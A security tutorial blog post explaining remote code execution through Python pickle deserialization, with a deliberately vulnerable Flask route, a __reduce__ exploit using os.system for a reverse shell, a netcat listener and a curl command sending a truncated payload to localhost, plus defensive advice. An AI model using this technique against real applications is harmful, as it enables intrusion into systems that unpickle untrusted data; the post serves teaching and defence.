In a recent challenge I needed to get access to a system by exploiting the way Python deserializes data using the
pickle module. In this article I want to give a quick introduction of how to pickle/unpickle data, highlight the issues that can arise when your program deals with data from untrusted sources and “dump” my own notes.
For running the example code I’m using Python 3.8.2 on macOS 10.15; the demonstration of the reverse shell is just a connect-back to a loopback address.
TL;DR: Never unpickle data from sources you don’t trust. Otherwise you open your app up to a relatively simple way of remote code execution.
In Python, the
pickle module lets you serialize and deserialize data. Essentially, this means that you can convert a Python object into a stream of bytes and then reconstruct it (including the object’s internal structure) later in a different process or environment by loading that stream of bytes.
When consulting the Python docs for
pickle one cannot miss the following warning:
Warning: The pickle module is not secure. Only unpickle data you trust.
Let’s find out why that is and how unpickling untrusted data could ruin your day.
How to dump and load?
In Python you can serialize objects by using
The pickled representation we’re getting back from
dumps will look like this:
And now reading the serialized data back in…
…will give us our list object back:
['pickle', 'me', 1, 2, 3]
What is actually happening behind the scenes is that the byte-stream created by
dumps contains opcodes that are then one-by-one executed as soon as we load the pickle back in. If you are curious how the instructions in this pickle look like, you can use
pickletools to create a disassembly:
>>> pickled = pickle.dumps(['pickle', 'me', 1, 2, 3]) >>> import pickletools >>> pickletools.dis(pickled) 0: \x80 PROTO 4 2: \x95 FRAME 25 11: ] EMPTY_LIST 12: \x94 MEMOIZE (as 0) 13: ( MARK 14: \x8c SHORT_BINUNICODE 'pickle' 22: \x94 MEMOIZE (as 1) 23: \x8c SHORT_BINUNICODE 'me' 27: \x94 MEMOIZE (as 2) 28: K BININT1 1 30: K BININT1 2 32: K BININT1 3 34: e APPENDS (MARK at 13) 35: . STOP highest protocol among opcodes = 4
Controlling the behavior of pickling/unpickling
Not every object can be serialized (e.g. file handles) and pickling and unpickling certain objects (like functions or classes) comes with restrictions. The Python docs give you a good overview what can and cannot be pickled.
While in most cases you don’t need to do anything special to make an object “picklable”,
pickle still allows you to define a custom behavior for the pickling process for your class instances.
Reading a bit further down in the docs we can see that implementing
__reduce__ is exactly what we would need to get code execution, when viewed from an attacker’s perspective:
__reduce__()method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order:
- A callable object that will be called to create the initial version of the object.
- A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. […]
So by implementing
__reduce__ in a class which instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this for getting our own reverse shell code executed.
Creating a vulnerable app
Now that we have a basic idea of how to create dangerous data to unpickle, let’s build a vulnerable app for demonstration purposes.
We’ll use the web framework Flask to create a small web application with one route.
Let’s install Flask in a new virtual environment:
# setup virtualenv virtualenv venv --python=/your/path/to/python # activate source venv/bin/activate # install Flask pip install Flask
And now create
/hackme we implement a POST route that takes form data
pickled. The data comes encoded in base64 (for transfer), is decoded and then unpickled.
Let’s run the app with
flask run and then prepare our malicious pickled data to send.
Creating the exploit
As described above we want to create a class that implements
__reduce__ and then serialize an instance of that class.
We’ll call our class
RCE and let its
__reduce__ method return a tuple of a callable and a tuple of arguments (as per the mentioned docs).
Our callable will be
os.system and the argument a common reverse shell snippet using a named pipe, that will run on our macOS demo machine.
Now let’s run the exploit script to create a base64 encoded pickle byte stream:
$ python exploit.py b'gASVbgAAAAAAAACMBX...
If you run
pickletools.dis again, you will see the
system callable plus arguments and the
REDUCE opcode (
Sending the payload
Finally, we can start a netcat listener and send the payload to our listening Flask application:
# netcat listener for reverse shell in separate window/pane nc -nvl 1234 # Send request curl -d "pickled=gASVbgAAAAAAAACMBX..." http://127.0.0.1:5000/hackme
After sending the http request to
/hackme, our code will execute and give us a shell back.
Lesson from this demonstration: don’t unpickle untrusted data. It doesn’t matter if you receive this pickled data from anonymous users over the network or if it’s passed to you to restore a session or program state.
If you need to work with untrusted data – depending on your use case – consider signing the data if it could have been modified on the way to you or on disk, or choose a different (safer) serialization method altogether (like JSON), as per the docs. When storing pickles on the filesystem it is also worth checking the file permissions to prevent privilege escalations through modification of those pickles.
To learn more, I recommend watching the BlackHat 2011 talk “Sour Pickles, A serialised exploitation guide in one part” by Marco Slaviero. He describes in detail the (un)pickling process, the pickle virtual machine parts, and how to craft more general shellcodes using a custom toolset.